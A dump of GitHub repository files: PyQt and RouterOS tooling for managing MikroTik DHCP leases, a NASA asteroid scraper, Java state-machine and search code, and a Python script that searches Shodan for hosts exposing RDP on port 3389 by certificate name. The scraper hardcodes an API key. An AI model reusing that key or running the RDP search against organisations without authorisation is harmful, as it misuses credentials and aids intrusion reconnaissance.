self.dateTimeEdit.setObjectName(\"dateTimeEdit\")\n self.label_4 = QtWidgets.QLabel(Form)\n self.label_4.setGeometry(QtCore.QRect(0, 90, 151, 21))\n self.label_4.setObjectName(\"label_4\")\n self.radioButton = QtWidgets.QRadioButton(Form)\n self.radioButton.setGeometry(QtCore.QRect(150, 90, 117, 22))\n self.radioButton.setObjectName(\"radioButton\")\n self.buttonGroup_2 = QtWidgets.QButtonGroup(Form)\n self.buttonGroup_2.setObjectName(\"buttonGroup_2\")\n self.buttonGroup_2.addButton(self.radioButton)\n self.radioButton_2 = QtWidgets.QRadioButton(Form)\n self.radioButton_2.setGeometry(QtCore.QRect(150, 120, 117, 22))\n self.radioButton_2.setObjectName(\"radioButton_2\")\n self.buttonGroup_2.addButton(self.radioButton_2)\n self.radioButton_3 = QtWidgets.QRadioButton(Form)\n self.radioButton_3.setEnabled(True)\n self.radioButton_3.setGeometry(QtCore.QRect(150, 150, 117, 22))\n self.radioButton_3.setObjectName(\"radioButton_3\")\n self.buttonGroup_2.addButton(self.radioButton_3)\n self.dateTimeEdit_3 = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit_3.setGeometry(QtCore.QRect(90, 60, 194, 27))\n self.dateTimeEdit_3.setObjectName(\"dateTimeEdit_3\")\n self.label_3 = QtWidgets.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(0, 60, 91, 21))\n self.label_3.setObjectName(\"label_3\")\n self.dateTimeEdit_4 = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit_4.setGeometry(QtCore.QRect(90, 230, 194, 27))\n self.dateTimeEdit_4.setObjectName(\"dateTimeEdit_4\")\n self.dateTimeEdit_2 = QtWidgets.QDateTimeEdit(Form)\n self.dateTimeEdit_2.setGeometry(QtCore.QRect(90, 200, 194, 27))\n self.dateTimeEdit_2.setObjectName(\"dateTimeEdit_2\")\n self.label_2 = QtWidgets.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(0, 200, 91, 21))\n self.label_2.setObjectName(\"label_2\")\n self.radioButton_4 = QtWidgets.QRadioButton(Form)\n self.radioButton_4.setEnabled(True)\n self.radioButton_4.setGeometry(QtCore.QRect(150, 320, 117, 22))\n self.radioButton_4.setObjectName(\"radioButton_4\")\n self.radioButton_5 = QtWidgets.QRadioButton(Form)\n self.radioButton_5.setGeometry(QtCore.QRect(150, 290, 117, 22))\n self.radioButton_5.setObjectName(\"radioButton_5\")\n self.radioButton_6 = QtWidgets.QRadioButton(Form)\n self.radioButton_6.setGeometry(QtCore.QRect(150, 260, 117, 22))\n self.radioButton_6.setObjectName(\"radioButton_6\")\n self.label_5 = QtWidgets.QLabel(Form)\n self.label_5.setGeometry(QtCore.QRect(0, 260, 151, 21))\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(Form)\n self.label_6.setGeometry(QtCore.QRect(0, 230, 91, 21))\n 
self.label_6.setObjectName(\"label_6\")\n self.dateTimeEdit.setDisplayFormat('dd.MM.yyyy hh:mm')\n self.dateTimeEdit_2.setDisplayFormat('dd.MM.yyyy hh:mm')\n self.dateTimeEdit_3.setDisplayFormat('dd.MM.yyyy hh:mm')\n self.dateTimeEdit_4.setDisplayFormat('dd.MM.yyyy hh:mm')\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Расписание\"))\n self.pushButton.setText(_translate(\"Form\", \"Установить\"))\n self.pushButton_2.setText(_translate(\"Form\", \"+\"))\n self.label_7.setText(_translate(\"Form\", \"Format: day.month.year hour:min\"))\n self.label.setText(_translate(\"Form\", \"Включить :\"))\n self.label_4.setText(_translate(\"Form\", \"Повторять каждый :\"))\n self.radioButton.setText(_translate(\"Form\", \"день\"))\n self.radioButton_2.setText(_translate(\"Form\", \"месяц\"))\n self.radioButton_3.setText(_translate(\"Form\", \"год\"))\n self.label_3.setText(_translate(\"Form\", \"Отключить:\"))\n self.label_2.setText(_translate(\"Form\", \"Включить :\"))\n self.radioButton_4.setText(_translate(\"Form\", \"год\"))\n self.radioButton_5.setText(_translate(\"Form\", \"месяц\"))\n self.radioButton_6.setText(_translate(\"Form\", \"день\"))\n self.label_5.setText(_translate(\"Form\", \"Повторять каждый :\"))\n self.label_6.setText(_translate(\"Form\", \"Отключить:\"))\n\n\n\n\n" }, { "alpha_fraction": 0.8145161271095276, "alphanum_fraction": 0.8145161271095276, "avg_line_length": 40.33333206176758, "blob_id": "8a701d9a245a8609d80ceb77a431fba510ceafa5", "content_id": "4770c298615a8a81e48818bfe988e949880fb5ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 361, "license_type": "no_license", "max_line_length": 85, "num_lines": 6, "path": "/README.md", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# study\n\nПрограмма работает с Lease dhcp сервера, задает статику\\удаляет lease\n\nОбойти статику на dhcp-сервере можно статикой на устройстве, поэтому нужно выполнить:\nhttps://wiki.mikrotik.com/wiki/How_to_block_non_DHCP_clients_without_the_firewall\n" }, { "alpha_fraction": 0.5242603421211243, "alphanum_fraction": 0.5254437923431396, "avg_line_length": 29.178571701049805, "blob_id": "b4c317d3717334e7bf161ae48a6277230060d66a", "content_id": "660742d8c097ec4e0bdf00d76be19dcde5007161", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 67, "num_lines": 28, "path": "/same.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import logging\nimport io\nfrom contextlib import redirect_stdout\nfrom re import match\n\n\nclass Same:\n\n def __init__(self, router):\n self.router = router\n\n def make(self, *args):\n with io.StringIO() as buf, redirect_stdout(buf):\n if not self.router.talk(args):\n logging.debug('Already exist')\n self.answer = buf.getvalue()\n logging.debug(self.answer)\n if \">>> !re\" in self.answer.split('\\n'):\n for line in self.answer.split('\\n'):\n if match('^.*\\.id.*', line):\n return match('^.*\\.id=(.*)', line).group(1)\n else:\n return False\n\n def getanswer(self, *args):\n with io.StringIO() as buf, redirect_stdout(buf):\n self.router.talk(args)\n return buf.getvalue()\n" }, { "alpha_fraction": 0.6403564810752869, "alphanum_fraction": 0.6791852116584778, "avg_line_length": 42.61111068725586, "blob_id": 
"c3b16ff5b9631ca29b6726ded281a6fd6f45db2a", "content_id": "16f4773af34628f1813e19c5624ca2ce1653f1c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1581, "license_type": "no_license", "max_line_length": 70, "num_lines": 36, "path": "/but1.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'untitled2.ui'\n#\n# Created by: PyQt5 UI code generator 5.5.1\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtWidgets\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(150, 181)\n self.pushButton = QtWidgets.QPushButton(Form)\n self.pushButton.setGeometry(QtCore.QRect(20, 10, 99, 27))\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton_2 = QtWidgets.QPushButton(Form)\n self.pushButton_2.setGeometry(QtCore.QRect(20, 50, 99, 27))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.pushButton_3 = QtWidgets.QPushButton(Form)\n self.pushButton_3.setGeometry(QtCore.QRect(20, 90, 99, 27))\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.pushButton_4 = QtWidgets.QPushButton(Form)\n self.pushButton_4.setGeometry(QtCore.QRect(20, 130, 99, 27))\n self.pushButton_4.setObjectName(\"pushButton_4\")\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"None\"))\n self.pushButton.setText(_translate(\"Form\", \"make static\"))\n self.pushButton_2.setText(_translate(\"Form\", \"inet is on\"))\n self.pushButton_3.setText(_translate(\"Form\", \"remove static\"))\n self.pushButton_4.setText(_translate(\"Form\", \"Расписание\"))\n\n" }, { "alpha_fraction": 0.578064501285553, "alphanum_fraction": 0.578064501285553, "avg_line_length": 35.904762268066406, "blob_id": "6cef16d0cdb9c449a2f288b2ef557952bdde5446", "content_id": "14afd66ae0c4de69594d1e37a1c8c0fa74d94e7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 775, "license_type": "no_license", "max_line_length": 88, "num_lines": 21, "path": "/scirpt.py", "repo_name": "evgeniy-p/study", "src_encoding": "UTF-8", "text": "import same\n\n\nclass Scripts(same.Same):\n\n def __init__(self, router):\n super().__init__(router)\n\n def make_script(self, host, addr, method, disabled='yes'):\n self.remove_script(host, method)\n self.make('/system/script/add', '=name={}_'.format(method) + host,\n '=source=: ip firewall filter {{ set [find comment=sched_{}] '\n 'disabled={}}}'.format(addr, disabled))\n\n def remove_script(self, host, method):\n script_id = self.make('/system/script/print', '?name={}_'.format(method) + host)\n if script_id:\n self.make('/system/script/remove', '=.id='+script_id)\n\n def script_is_here(self, host, method):\n return self.make('/system/script/print', '?name={}_'.format(method) + host)\n" } ]
10
jschelert/shodan-rest-api-python
https://github.com/jschelert/shodan-rest-api-python
2d5207e1230356eee6674495e40666ac94eb8280
e733aec49ddb5d432fec329fe5bfc31067adfb12
32cf361a6605c5adb651065ffd82a17c7dbbd325
refs/heads/master
2022-08-09T18:20:44.636096
2020-05-21T22:22:32
2020-05-21T22:22:32
265,963,490
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5904255509376526, "avg_line_length": 33.15151596069336, "blob_id": "31f220743d484c192764b789d3bb19a143df178b", "content_id": "b46a998b877580f8a603ca80df94db46652a6bc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1128, "license_type": "no_license", "max_line_length": 148, "num_lines": 33, "path": "/Shodan-Rest.py", "repo_name": "jschelert/shodan-rest-api-python", "src_encoding": "UTF-8", "text": "import shodan\nimport requests\nimport json\nimport time\nfrom csv import reader\n\n# Defines Variable for Current Time and Appends Shodan for File Creation\ncurrent_time = str(time.time())\n(\"shodan\", current_time + '.txt')\n\n#Shodan API Key\nSHODAN_API_KEY = \"\" \napi = shodan.Shodan(SHODAN_API_KEY)\n\n#Definte any facets\nFACETS = \"\"\n\n#Ports string variable\nPORT =\"Port:3389\"\n\n# Open File Shodan and writes via the json.dump method\nwith open(('shodan' + current_time + '.txt') , \"w\") as outfile:\n #Opens file of FQDN Suffixes\n with open('C:\\python38\\\\fdqn.txt', 'r') as f:\n for line in f:\n line = line.strip()\n SEARCH = \"ssl.cert.subject.cn:\" + line + ' ' + PORT\n print (SEARCH)\n searchResolve = 'https://api.shodan.io/shodan/host/search?' + '&key=' + SHODAN_API_KEY + '&query=' + SEARCH + '&facets' + FACETS\n resolved = requests.get(searchResolve)\n jsonResponse = resolved.json()\n json.dump(jsonResponse, outfile, ensure_ascii=False, indent=4)\n time.sleep(2)\n\n" } ]
1
alper-python/web_scraping_week1
https://github.com/alper-python/web_scraping_week1
d6c33adf69e63c93f9e652b4ec0922ffd30163fe
b9ef867c4259229f4220ddccd7d5fc7cd510d8d1
19e929eb01b930770cb0c9ce0c8cf8db7197eb1b
refs/heads/main
2023-05-03T03:29:12.727289
2021-05-22T09:25:39
2021-05-22T09:25:39
369,766,521
0
1
null
2021-05-22T09:23:04
2021-05-22T09:20:56
2021-05-09T23:38:04
null
[ { "alpha_fraction": 0.5565920472145081, "alphanum_fraction": 0.5945273637771606, "avg_line_length": 25.220338821411133, "blob_id": "ed425a61e969f16f76bffd2c5be197b69a81dbc7", "content_id": "6d07d84f2c6b0143bf804e2b127a351d8f0c536a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1634, "license_type": "no_license", "max_line_length": 85, "num_lines": 59, "path": "/web_scraping_week1.py", "repo_name": "alper-python/web_scraping_week1", "src_encoding": "UTF-8", "text": "import requests\r\nimport os\r\nimport csv\r\n\r\napi_key = 'DrP4hdZ7m6qTa3Zhm6fXgpx1esUUz27acB7BdwT8'\r\n\r\nurl = 'https://api.nasa.gov/neo/rest/v1/feed'\r\nstart_date = '2016-07-01'\r\nend_date = '2016-07-08'\r\nfinish_date = '2016-07-30'\r\n\r\nresponse1 = requests.get(url,params={\r\n 'start_date':start_date,\r\n 'end_date':end_date,\r\n 'api_key':api_key\r\n})\r\nasteroids1 = response1.json()\r\n\r\n#başlıklar için(csv dosyasının sistemde old knt et. yok ise bu başlıkları ekle.\r\nliste = []\r\nfor i in (asteroids1['near_earth_objects']['2016-07-01'][0]).keys():\r\n liste.append(i)\r\nif not os.path.exists(\"asteroids.cvs\"):\r\n with open(\"asteroids.cvs\", \"a\",newline=\"\") as cvsfile:\r\n writer = csv.writer(cvsfile)\r\n liste = (asteroids1['near_earth_objects']['2016-07-01'][0]).keys()\r\n writer.writerow(liste)\r\n\r\n\r\n\r\nliste = list(asteroids1['near_earth_objects']) #7 günlük tarih aralığını bulduk\r\nliste.sort()# tarihe göre sıraladık\r\nfor i in liste[:-1]:\r\n new_list = asteroids1['near_earth_objects'][i]\r\n print(i)\r\n for i in new_list:\r\n print(i)\r\n\r\n###\r\nloop = True\r\nwhile loop:\r\n\r\n print(asteroids1['links']['next'])\r\n url = asteroids1['links']['next']\r\n response1 = requests.get(url)\r\n asteroids1 = response1.json()\r\n\r\n liste = list(asteroids1['near_earth_objects']) # 7 günlük tarih aralığını bulduk\r\n liste.sort() # tarihe göre sıraladık\r\n\r\n for i in liste[:-1]:\r\n if i <= finish_date:\r\n new_list = asteroids1['near_earth_objects'][i]\r\n print(i)\r\n for i in new_list:\r\n print(i)\r\n else:\r\n loop = False\r\n break\r\n\r\n" } ]
1
markeyev/appengine-config-transformer
https://github.com/markeyev/appengine-config-transformer
dc005e63270ae017ea171472a86bbc54a9e805b2
f99da8256ff8c0468418eda267cde795ab60c446
3a0cf32a740afae47f713c603ccbb98804f7abc6
refs/heads/master
2022-02-28T09:03:18.840632
2019-10-05T14:54:07
2019-10-05T14:54:07
213,017,410
1
0
Apache-2.0
2019-10-05T14:52:04
2019-09-01T21:04:10
2019-10-05T14:29:04
null
[ { "alpha_fraction": 0.7476793527603149, "alphanum_fraction": 0.75527423620224, "avg_line_length": 36.03125, "blob_id": "3bc61f3b9136cbf6df41e2c03174be531b1cbb94", "content_id": "683e1d8f9288e24cc2a23589879af957822b27de", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1185, "license_type": "permissive", "max_line_length": 151, "num_lines": 32, "path": "/README.md", "repo_name": "markeyev/appengine-config-transformer", "src_encoding": "UTF-8", "text": "Copyright 2015 Google Inc.\nAll rights reserved.\n\n# App Engine Configuration File Transformer\n\nUse this command-line tool to transform and copy your YAML formatted App Engine configuration files\ninto JSON formatted files that are suppported by the Google App Engine Admin API.\n\n## Requirements:\n\n* Install Python, either:\n * [Python 2.7](https://www.python.org/)\n * [App Engine SDK for Python](https://cloud-dot-devsite.googleplex.com/appengine/downloads#Google_App_Engine_SDK_for_Python)\n* Install the 'yaml' library: [PyYAML package](https://pypi.python.org/pypi/PyYAML)\n\n### Example Installation:\n\n1. Download and install the [App Engine SDK for Python](https://cloud-dot-devsite.googleplex.com/appengine/downloads#Google_App_Engine_SDK_for_Python).\n1. Install the 'yaml' library: \n `sudo apt-get install python-yaml`\n1. Clone the appengine-config-transformer project: \n `git clone https://github.com/GoogleCloudPlatform/appengine-config-transformer.git`\n\n\n## Usage:\n\n ./convert_yaml.py app.yaml > app.json\n \n### Example:\n\n cd appengine-config-transformer \n ./convert_yaml.py $HOME/appengine-guestbook-python/app.yaml > $HOME/appengine-guestbook-python/app.json\n" }, { "alpha_fraction": 0.7115073204040527, "alphanum_fraction": 0.7204213738441467, "avg_line_length": 36.39393997192383, "blob_id": "fd71f1b2f855b5b181fc0b6be3f5dbe2b8dd5365", "content_id": "f559accdd985dcb333d7ce430038127c7e301281", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1234, "license_type": "permissive", "max_line_length": 77, "num_lines": 33, "path": "/setup.py", "repo_name": "markeyev/appengine-config-transformer", "src_encoding": "UTF-8", "text": "# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport setuptools\nimport os\n\n# Compute the package tree of yaml_conversion since distutils doesn't do it\n# for us.\npackages = []\nbase = os.path.dirname(__file__) or '.'\nfor root, dirs, files in os.walk(os.path.join(base, 'yaml_conversion')):\n if '__init__.py' in files:\n packages.append('.'.join(root[len(base) + 1:].split(os.path.sep)))\n\nsetuptools.setup(\n name=\"appengine-config-transformer\",\n version=\"0.1\",\n description=\"Tool for converting between YAML and JSON representations.\",\n packages=packages,\n py_modules=['convert_yaml'],\n entry_points={'console_scripts': ['convert_yaml=convert_yaml:main']},\n)\n" } ]
2
k-gregory/KPI
https://github.com/k-gregory/KPI
5e8f3c44d9d42cc7f48bfa81c4fb0f1362e21f61
333abfd850824693a8ead5dd0ca5702626e7b4bc
96e244f74604f5cb949a1c4aa7bead864cb272c0
refs/heads/master
2021-03-16T11:06:32.559712
2018-06-13T05:59:47
2018-06-13T05:59:47
86,113,595
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4980744421482086, "alphanum_fraction": 0.5053487420082092, "avg_line_length": 26.5, "blob_id": "43a2acd2155f47a7d080b2424de167c69f1a1cc0", "content_id": "2ccc37190b3763e0663482ecbe2aa2ffa3ad4a4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2337, "license_type": "no_license", "max_line_length": 56, "num_lines": 82, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab1/impl/StateFSM.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab1.impl;\r\n\r\nimport io.github.k_gregory.otp.lab1.Event;\r\nimport io.github.k_gregory.otp.lab1.FSM;\r\nimport io.github.k_gregory.otp.lab1.MachineState;\r\n\r\nimport static io.github.k_gregory.otp.lab1.Event.*;\r\n\r\npublic class StateFSM extends FSM {\r\n private PatternState s = PatternState.START;\r\n\r\n @Override\r\n public void reset() {\r\n s = PatternState.START;\r\n }\r\n\r\n @Override\r\n public MachineState nextState(Event e) {\r\n s = s.nextState(e);\r\n return s.getMachineState();\r\n }\r\n\r\n private enum PatternState {\r\n ERROR(MachineState.ERROR) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == PLUS) return Q1;\r\n else return ERROR;\r\n }\r\n },\r\n START(MachineState.START) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == PLUS) return Q1;\r\n else return ERROR;\r\n }\r\n },\r\n Q1(MachineState.Q1) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == DIGIT) return Q2;\r\n else return ERROR;\r\n }\r\n },\r\n Q2(MachineState.Q2) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == DIGIT) return Q2;\r\n else if (e == LATIN_CAPITAL) return Q3;\r\n else if (e == EOF) return SUCCESS;\r\n else return ERROR;\r\n }\r\n },\r\n Q3(MachineState.Q3) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n if (e == LATIN_CAPITAL) return Q3;\r\n else if (e == EOF) return SUCCESS;\r\n else return ERROR;\r\n }\r\n },\r\n SUCCESS(MachineState.SUCCESS) {\r\n @Override\r\n public PatternState nextState(Event e) {\r\n return ERROR;\r\n }\r\n };\r\n\r\n\r\n private MachineState machineState;\r\n\r\n PatternState(MachineState machineState) {\r\n this.machineState = machineState;\r\n }\r\n\r\n public abstract PatternState nextState(Event e);\r\n\r\n public MachineState getMachineState() {\r\n return machineState;\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6057818531990051, "alphanum_fraction": 0.6254927515983582, "avg_line_length": 19.13888931274414, "blob_id": "24927ae29bd7e61f35d29b37a51f43b6275b06f1", "content_id": "09f87bfe9fc01c2dacd775a137fc182e66ba0606", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 761, "license_type": "no_license", "max_line_length": 85, "num_lines": 36, "path": "/otp/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "version=0.1\r\n\r\napply plugin: 'antlr'\r\napply plugin: 'java'\r\n\r\nrepositories {\r\n jcenter()\r\n}\r\n\r\ntask fatJar(type: Jar) {\r\n\tmanifest {\r\n attributes 'Implementation-Title': 'Osnovi technologij programuvannya',\r\n \t'Implementation-Version': version\r\n }\r\n baseName = project.name + '-all'\r\n from { configurations.compile.collect { it.isDirectory() ? 
it : zipTree(it) } }\r\n with jar\r\n}\r\n\r\ndependencies {\r\n antlr 'org.antlr:antlr4:4.6'\r\n compile 'commons-io:commons-io:2.5'\r\n compile 'gov.nist.math:jama:1.0.3'\r\n testCompile 'junit:junit:4.12'\r\n testCompile 'org.hamcrest:hamcrest-library:1.3'\r\n}\r\n\r\ngenerateGrammarSource{\r\n arguments+=['-visitor']\r\n}\r\n\r\ntest{\r\n testLogging{\r\n exceptionFormat \"full\"\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5784804224967957, "alphanum_fraction": 0.5813841223716736, "avg_line_length": 33.02259826660156, "blob_id": "d1fad1deaf7e4f68388afc752292cc56cfb5b124", "content_id": "e3851cae444a73f0bfe67df9bbf929bfe2d3cdda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6199, "license_type": "no_license", "max_line_length": 98, "num_lines": 177, "path": "/oldtest/rss-reader/src/main/java/io/github/k_gregory/otp/rss_reader/SearchService.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.rss_reader;\r\n\r\nimport com.google.common.collect.SortedSetMultimap;\r\nimport com.google.common.collect.TreeMultimap;\r\nimport org.springframework.util.StreamUtils;\r\n\r\nimport java.io.IOException;\r\nimport java.nio.charset.Charset;\r\nimport java.nio.charset.StandardCharsets;\r\nimport java.util.HashMap;\r\nimport java.util.Map;\r\nimport java.util.SortedSet;\r\nimport java.util.TreeSet;\r\nimport java.util.regex.Pattern;\r\nimport java.util.stream.Collectors;\r\nimport java.util.stream.Stream;\r\n\r\nclass Document {\r\n @Override\r\n public String toString() {\r\n return \"Document{\" +\r\n \"text='\" + text + '\\'' +\r\n '}';\r\n }\r\n\r\n public String getText() {\r\n return text;\r\n }\r\n\r\n private final String text;\r\n\r\n\r\n public Document(String text) {\r\n this.text = text;\r\n }\r\n\r\n public Map<String, Long> calculateTermCount() {\r\n Pattern nonWord = Pattern.compile(\"[^\\\\w\\\\d]+\", Pattern.UNICODE_CHARACTER_CLASS);\r\n Pattern nonWordStart = Pattern.compile(\"^[^\\\\w\\\\d]+\", Pattern.UNICODE_CHARACTER_CLASS);\r\n String clearedStartText = nonWordStart\r\n .matcher(text)\r\n .replaceFirst(\"\");\r\n\r\n Map<String, Long> collect = Stream.of(nonWord.split(clearedStartText.toLowerCase()))\r\n .collect(Collectors.groupingBy(String::toString, Collectors.counting()));\r\n return collect;\r\n }\r\n}\r\n\r\nclass TermDocumentInfo implements Comparable<TermDocumentInfo> {\r\n private final Document document;\r\n private final long termFrequency;\r\n\r\n TermDocumentInfo(Document document, long termFrequency) {\r\n this.document = document;\r\n this.termFrequency = termFrequency;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"TermDocumentInfo{\" +\r\n \"document=\" + document +\r\n \", termFrequency=\" + termFrequency +\r\n '}';\r\n }\r\n\r\n @Override\r\n public boolean equals(Object o) {\r\n if (this == o) return true;\r\n if (o == null || getClass() != o.getClass()) return false;\r\n\r\n TermDocumentInfo that = (TermDocumentInfo) o;\r\n\r\n if (termFrequency != that.termFrequency) return false;\r\n return document.equals(that.document);\r\n }\r\n\r\n @Override\r\n public int hashCode() {\r\n int result = document.hashCode();\r\n result = 31 * result + (int) (termFrequency ^ (termFrequency >>> 32));\r\n return result;\r\n }\r\n\r\n @Override\r\n public int compareTo(TermDocumentInfo o) {\r\n int tc = Long.compare(termFrequency, o.termFrequency);\r\n return tc == 0 ? 
document.getText().compareTo(o.document.getText()) : tc;\r\n /*\r\n int docCompare = document.getText().compareTo(o.document.getText());\r\n return docCompare == 0 ? Long.compare(termFrequency, o.termFrequency) : docCompare;\r\n */\r\n }\r\n}\r\n\r\npublic class SearchService {\r\n private Map<String, Long> termFrequency = new HashMap<>();\r\n private SortedSetMultimap<String, TermDocumentInfo> termDocumentIndex = TreeMultimap.create();\r\n // private Map<String, SortedSet<TermDocumentInfo>> ttt = new HashMap<>();\r\n\r\n public static void main(String... args) throws IOException {\r\n\r\n SearchService search = new SearchService();\r\n String s = StreamUtils\r\n .copyToString(\r\n SearchService.class.getClassLoader().getResourceAsStream(\"pap.txt\")\r\n , StandardCharsets.UTF_8\r\n );\r\n\r\n for(int i = 0; i < 5; i++)\r\n search.indexDocument(new Document(s+i));\r\n search = new SearchService();\r\n\r\n long l = System.currentTimeMillis();\r\n search.indexDocument(new Document(s));\r\n System.out.println(System.currentTimeMillis() - l);\r\n /*\r\n System.out.println((System.currentTimeMillis() - l));\r\n search.indexDocument(new Document(\"hi there fuck\"));\r\n search.indexDocument(new Document(\"fuck you\"));\r\n search.indexDocument(new Document(\"fuck you, you ASShole\"));\r\n search.indexDocument(new Document(\"asshole in sight, lol\"));\r\n search.search(\"you\");\r\n System.out.println(search.termFrequency);\r\n System.out.println(search.termDocumentIndex);\r\n */\r\n\r\n }\r\n\r\n private double cosineSimilarity(Document d1, Document q){\r\n Map<String, Long> d1tf = d1.calculateTermCount();\r\n Map<String, Long> qtf = q.calculateTermCount();\r\n qtf\r\n .entrySet()\r\n .stream()\r\n .map(e->e.getValue()/(double)termFrequency.get(e.getKey()))\r\n .map(c->c*c);\r\n return 0;\r\n //.collect(Collectors.su)\r\n }\r\n\r\n public void search(String query){\r\n Document q = new Document(query);\r\n Map<String, Long> queryTermCount = q.calculateTermCount();\r\n queryTermCount\r\n .keySet()\r\n .stream()\r\n .flatMap(k -> termDocumentIndex.get(k).stream())\r\n .sorted((o1, o2) -> {\r\n return 0;\r\n })\r\n .forEach(System.out::println);\r\n }\r\n\r\n public void indexDocument(Document document) {\r\n Map<String, Long> documentWordCount = document.calculateTermCount();\r\n for (Map.Entry<String, Long> termInfo : documentWordCount.entrySet()) {\r\n termFrequency.put(\r\n termInfo.getKey(),\r\n termFrequency.getOrDefault(termInfo.getKey(), 0L) + 1\r\n );\r\n /*SortedSet<TermDocumentInfo> termDocumentInfos = ttt.get(termInfo.getKey());\r\n if(termDocumentInfos == null){\r\n termDocumentInfos = new TreeSet<>();\r\n }\r\n termDocumentInfos.add(new TermDocumentInfo(document, termInfo.getValue()));\r\n ttt.put(termInfo.getKey(), termDocumentInfos);\r\n */\r\n //long l = System.nanoTime();\r\n termDocumentIndex.put(\r\n termInfo.getKey(),\r\n new TermDocumentInfo(document, termInfo.getValue())\r\n );\r\n //System.out.println(System.nanoTime()- l);\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6586102843284607, "alphanum_fraction": 0.6586102843284607, "avg_line_length": 22.64285659790039, "blob_id": "cdb4351c13737fa03629de0d4ec0357b2d725534", "content_id": "2c0006a0456bc4b4ae848eb0a0e42e3154aa4e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 331, "license_type": "no_license", "max_line_length": 59, "num_lines": 14, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/exception/UserExistsException.java", "repo_name": 
"k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.exception;\n\npublic class UserExistsException extends RuntimeException {\n private final String name;\n\n public UserExistsException(String name) {\n super(\"User \" + name + \" already exists\");\n this.name = name;\n }\n\n public String getName() {\n return name;\n }\n}\n" }, { "alpha_fraction": 0.7283422350883484, "alphanum_fraction": 0.7283422350883484, "avg_line_length": 28.21875, "blob_id": "ab81c36a2aa2edf7e498c508615773f0672fc1a6", "content_id": "982c21bc24ca5916ef5756d261534742d01a582f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1055, "license_type": "no_license", "max_line_length": 98, "num_lines": 32, "path": "/numerical-methods/src/app/routes.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Routes} from \"@angular/router\";\nimport {TrapezoidComponent} from \"./trapezoid/trapezoid.component\";\nimport {NewtonSecondEvenlyComponent} from \"./newton-second-evenly/newton-second-evenly.component\";\nimport {NewtonFirstComponent} from \"./newton-first/newton-first.component\";\nimport {RombergComponent} from \"./romberg/romberg.component\";\n\n\nexport const routes: Routes = [{\n path: 'interpolation/newton-second-evenly',\n component: NewtonSecondEvenlyComponent,\n data: {\n name: 'Другий метод Ньютона з рівновіддаленими вузлами'\n }\n}, {\n path: 'interpolation/newton-first',\n component: NewtonFirstComponent,\n data: {\n name: 'Перший метод Ньютона з нерівновіддаленими вузлами'\n }\n}, {\n path: 